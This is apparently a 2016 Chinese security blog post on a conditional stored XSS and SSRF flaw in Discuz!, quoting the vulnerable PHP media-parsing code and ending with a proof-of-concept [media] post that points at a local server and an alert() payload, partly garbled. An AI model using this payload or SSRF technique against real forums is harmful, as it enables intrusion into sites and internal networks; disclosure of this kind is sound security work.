discuz!有条件存储型xss和ssrf
没穿底裤发表于 2016-02-08 02:03:10
文件source\function\function_discuzcode.phpfunction discuzcode 中
if(!defined('IN_MOBILE')) {
if(strpos($msglower, '[/media]') !== FALSE) {
$message = preg_replace("/\[media=([\w,]+)\]\s*([^\[\{url}')", $message);
}跟踪 parsemedia
function parsemedia($params, $url) {
$params = explode(',', $params);
$width = intval($params[1]) > 800 ? 800 : intval($params[1]);
$height = intval($params[2]) > 600 ? 600 : intval($params[2]);
$url = addslashes($url);
if(!in_array(strtolower(substr($url, 0, 6)), array('http:/', 'https:', 'ftp://', 'rtsp:/', 'mms://')) && !preg_match('/^static\//', $url) && !preg_match('/^data\//', $url)) {
return dhtmlspecialchars($url);
}
if($flv = parseflv($url, $width, $height)) {
return $flv;
}跟踪 parseflv
function parseflv($url, $width = 0, $height = 0) {
$lowerurl = strtolower($url);
$flv = $iframe = $imgurl = '';
if($lowerurl != str_replace(array('player.youku.com/player.php/sid/','tudou.com/v/','player.ku6.com/refer/'), '', $lowerurl)) {
$flv = $url;
} elseif(strpos($lowerurl, 'v.youku.com/v_show/') !== FALSE) {
$ctx = stream_context_create(array('http' => array('timeout' => 10)));
if(preg_match("/http:\/\/v.youku.com\/v_show\/id_([^\/]+)(.html|)/i", $url, $matches)) {
$flv = 'http://player.youku.com/player.php/sid/'.$matches[1].'/v.swf';
$iframe = 'http://player.youku.com/embed/'.$matches[1];
if(!$width && !$height) {
$api = 'http://v.youku.com/player/getPlayList/VideoIDS/'.$matches[1];
$str = stripslashes(file_get_contents($api, false, $ctx));
if(!empty($str) && preg_match("/\"logo\":\"(.+?)\"/i", $str, $image)) {
$url = substr($image[1], 0, strrpos($image[1], '/')+1);
$filename = substr($image[1], strrpos($image[1], '/')+2);
$imgurl = $url.'0'.$filename;
}
}
}
} elseif(strpos($lowerurl, 'tudou.com/programs/view/') !== FALSE) {
if(preg_match("/http:\/\/(www.)?tudou.com\/programs\/view\/([^\/]+)/i", $url, $matches)) {
$flv = 'http://www.tudou.com/v/'.$matches[2];
$iframe = 'http://www.tudou.com/programs/view/html5embed.action?code='.$matches[2];
if(!$width && !$height) {
$str = file_get_contents($url, false, $ctx);
if(!empty($str) && preg_match("/(.+?)/i", $str, $image)) {
$imgurl = trim($image[1]);
}
}
}
} elseif(strpos($lowerurl, 'v.ku6.com/show/') !== FALSE) {
if(preg_match("/http:\/\/v.ku6.com\/show\/([^\/]+).html/i", $url, $matches)) {
$flv = 'http://player.ku6.com/refer/'.$matches[1].'/v.swf';
if(!$width && !$height) {
$api = 'http://vo.ku6.com/fetchVideo4Player/1/'.$matches[1].'.html';
$str = file_get_contents($api, false, $ctx);
if(!empty($str) && preg_match("/\"picpath\":\"(.+?)\"/i", $str, $image)) {
$imgurl = str_replace(array('\u003a', '\u002e'), array(':', '.'), $image[1]);
}
}
}
} elseif(strpos($lowerurl, 'v.ku6.com/special/show_') !== FALSE) {
if(preg_match("/http:\/\/v.ku6.com\/special\/show_\d+\/([^\/]+).html/i", $url, $matches)) {
$flv = 'http://player.ku6.com/refer/'.$matches[1].'/v.swf';
if(!$width && !$height) {
$api = 'http://vo.ku6.com/fetchVideo4Player/1/'.$matches[1].'.html';
$str = file_get_contents($api, false, $ctx);
if(!empty($str) && preg_match("/\"picpath\":\"(.+?)\"/i", $str, $image)) {
$imgurl = str_replace(array('\u003a', '\u002e'), array(':', '.'), $image[1]);
}
}
}
} elseif(strpos($lowerurl, 'www.youtube.com/watch?') !== FALSE) {
if(preg_match("/http:\/\/www.youtube.com\/watch\?v=([^\/&]+)&?/i", $url, $matches)) {
$flv = 'http://www.youtube.com/v/'.$matches[1].'&hl=zh_CN&fs=1';
$iframe = 'http://www.youtube.com/embed/'.$matches[1];
if(!$width && !$height) {
$str = file_get_contents($url, false, $ctx);
if(!empty($str) && preg_match("/'VIDEO_HQ_THUMB':\s'(.+?)'/i", $str, $image)) {
$url = substr($image[1], 0, strrpos($image[1], '/')+1);
$filename = substr($image[1], strrpos($image[1], '/')+3);
$imgurl = $url.$filename;
}
}
}
} elseif(strpos($lowerurl, 'tv.mofile.com/') !== FALSE) {
if(preg_match("/http:\/\/tv.mofile.com\/([^\/]+)/i", $url, $matches)) {
$flv = 'http://tv.mofile.com/cn/xplayer.swf?v='.$matches[1];
if(!$width && !$height) {
$str = file_get_contents($url, false, $ctx);
if(!empty($str) && preg_match("/thumbpath=\"(.+?)\";/i", $str, $image)) {
$imgurl = trim($image[1]);
}
}
}
} elseif(strpos($lowerurl, 'v.mofile.com/show/') !== FALSE) {
if(preg_match("/http:\/\/v.mofile.com\/show\/([^\/]+).shtml/i", $url, $matches)) {
$flv = 'http://tv.mofile.com/cn/xplayer.swf?v='.$matches[1];
if(!$width && !$height) {
$str = file_get_contents($url, false, $ctx);
if(!empty($str) && preg_match("/thumbpath=\"(.+?)\";/i", $str, $image)) {
$imgurl = trim($image[1]);
}
}
}
} elseif(strpos($lowerurl, 'video.sina.com.cn/v/b/') !== FALSE) {
if(preg_match("/http:\/\/video.sina.com.cn\/v\/b\/(\d+)-(\d+).html/i", $url, $matches)) {
$flv = 'http://vhead.blog.sina.com.cn/player/outer_player.swf?vid='.$matches[1];
if(!$width && !$height) {
$api = 'http://interface.video.sina.com.cn/interface/common/getVideoImage.php?vid='.$matches[1];
$str = file_get_contents($api, false, $ctx);
if(!empty($str)) {
$imgurl = str_replace('imgurl=', '', trim($str));
}
}
}
} elseif(strpos($lowerurl, 'you.video.sina.com.cn/b/') !== FALSE) {
if(preg_match("/http:\/\/you.video.sina.com.cn\/b\/(\d+)-(\d+).html/i", $url, $matches)) {
$flv = 'http://vhead.blog.sina.com.cn/player/outer_player.swf?vid='.$matches[1];
if(!$width && !$height) {
$api = 'http://interface.video.sina.com.cn/interface/common/getVideoImage.php?vid='.$matches[1];
$str = file_get_contents($api, false, $ctx);
if(!empty($str)) {
$imgurl = str_replace('imgurl=', '', trim($str));
}
}
}
} elseif(strpos($lowerurl, 'http://my.tv.sohu.com/u/') !== FALSE) {
if(preg_match("/http:\/\/my.tv.sohu.com\/u\/[^\/]+\/(\d+)/i", $url, $matches)) {
$flv = 'http://v.blog.sohu.com/fo/v4/'.$matches[1];
if(!$width && !$height) {
$api = 'http://v.blog.sohu.com/videinfo.jhtml?m=view&id='.$matches[1].'&outType=3';
$str = file_get_contents($api, false, $ctx);
if(!empty($str) && preg_match("/\"cutCoverURL\":\"(.+?)\"/i", $str, $image)) {
$imgurl = str_replace(array('\u003a', '\u002e'), array(':', '.'), $image[1]);
}
}
}
} elseif(strpos($lowerurl, 'http://v.blog.sohu.com/u/') !== FALSE) {
if(preg_match("/http:\/\/v.blog.sohu.com\/u\/[^\/]+\/(\d+)/i", $url, $matches)) {
$flv = 'http://v.blog.sohu.com/fo/v4/'.$matches[1];
if(!$width && !$height) {
$api = 'http://v.blog.sohu.com/videinfo.jhtml?m=view&id='.$matches[1].'&outType=3';
$str = file_get_contents($api, false, $ctx);
if(!empty($str) && preg_match("/\"cutCoverURL\":\"(.+?)\"/i", $str, $image)) {
$imgurl = str_replace(array('\u003a', '\u002e'), array(':', '.'), $image[1]);
}
}
}
} elseif(strpos($lowerurl, 'http://www.ouou.com/fun_funview') !== FALSE) {
$str = file_get_contents($url, false, $ctx);
if(!empty($str) && preg_match("/var\sflv\s=\s'(.+?)';/i", $str, $matches)) {
$flv = $_G['style']['imgdir'].'/flvplayer.swf?&autostart=true&file='.urlencode($matches[1]);
if(!$width && !$height && preg_match("/var\simga=\s'(.+?)';/i", $str, $image)) {
$imgurl = trim($image[1]);
}
}
} elseif(strpos($lowerurl, 'http://www.56.com') !== FALSE) {
if(preg_match("/http:\/\/www.56.com\/\S+\/play_album-aid-(\d+)_vid-(.+?).html/i", $url, $matches)) {
$flv = 'http://player.56.com/v_'.$matches[2].'.swf';
$matches[1] = $matches[2];
} elseif(preg_match("/http:\/\/www.56.com\/\S+\/([^\/]+).html/i", $url, $matches)) {
$flv = 'http://player.56.com/'.$matches[1].'.swf';
}
if(!$width && !$height && !empty($matches[1])) {
$api = 'http://vxml.56.com/json/'.str_replace('v_', '', $matches[1]).'/?src=out';
$str = file_get_contents($api, false, $ctx);
if(!empty($str) && preg_match("/\"img\":\"(.+?)\"/i", $str, $image)) {
$imgurl = trim($image[1]);
}
}
}
if($flv) {
if(!$width && !$height) {
return array('flv' => $flv, 'imgurl' => $imgurl);
} else {
$width = addslashes($width);
$height = addslashes($height);
$flv = addslashes($flv);
$iframe = addslashes($iframe);
$randomid = 'flv_'.random(3);
$enablemobile = $iframe ? 'mobileplayer() ? "" : ' : '';
return '$(\''.$randomid.'\').innerHTML=('.$enablemobile.'AC_FL_RunContent(\'width\', \''.$width.'\', \'height\', \''.$height.'\', \'allowNetworking\', \'internal\', \'allowScriptAccess\', \'never\', \'src\', \''.$flv.'\', \'quality\', \'high\', \'bgcolor\', \'#ffffff\', \'wmode\', \'transparent\', \'allowfullscreen\', \'true\'));';
}
} else {
return FALSE;
}
}
可以看出多处使用 file_get_contentsurl可控,从而存在ssrf并且结果可以,返回 imgurl=用于
source\function\function_followcode.php
function fmakeflv($flv) {
$randomid = 'video_'.random(3);
$flv = is_array($flv) ? $flv : array('flv' => $flv);
if(!empty($flv['imgurl'])) {
$html = ' ';
} else {
$html = '';
}
return fcodedisp($html, 'video');
}限制:xss需要后台开启广播功能。ssrf需要 允许使用
[media] [flash] 等多媒体代码旧版本好像默认开启,新版默认关闭,不过后来开启的较多。
发贴(注:需工具提交,不然http://tudou.com 被转为http://tudou.com )
[media=0,0]http://127.0.0.1:8080/s.php?[url]http://tudou.com/programs/view/aaaa[/media]
http://127.0.0.1:8080/s.php内容为:
/Article/UploadPic/2016-2/20162322318814.gif’);”>aaalert(‘a’);
![2016020309200497[1]](http://7u2hr4.com1.z0.glb.clouddn.com/wp-content/uploads/2016/02/20160203092004971.png)
![2016020309200699[1]](http://7u2hr4.com1.z0.glb.clouddn.com/wp-content/uploads/2016/02/20160203092006991.png)
aaalert(‘a’);
ssrf 可能shell内网 百度某个从SSRF到内网WebShell之2
解决方案:
过滤